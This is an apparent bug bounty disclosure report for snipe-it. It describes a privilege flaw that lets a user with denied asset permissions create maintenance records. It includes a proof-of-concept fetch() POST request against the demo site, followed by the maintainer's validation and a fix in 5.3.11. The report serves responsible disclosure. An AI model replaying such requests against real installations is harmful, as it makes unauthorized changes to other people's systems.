Improper Privilege Management in snipe/snipe-it

Valid

Reported on

Feb 10th 2022

Description

Unprivilege user can create maintainance for asset

Proof of Concept

1. Create regular user and set DENY to all permissions in asset models.
2. Login as the user and sent bellow request to create maintainance for asset

await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
    "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
    "method": "POST",
    "mode": "cors"
});

Impact

unprivileged user can create maintainance for any asset

We are processing your report and will contact the snipe/snipe-it team within 24 hours. a year ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back a year ago
We have sent a follow up to the snipe/snipe-it team. We will try again in 7 days. a year ago
snipe
a year ago

Maintainer

"Create regular user and set DENY to all permissions in asset models."

Assets or asset models?

snipe validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe marked this as fixed in 5.3.11 with commit 321be4 a year ago
snipe has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation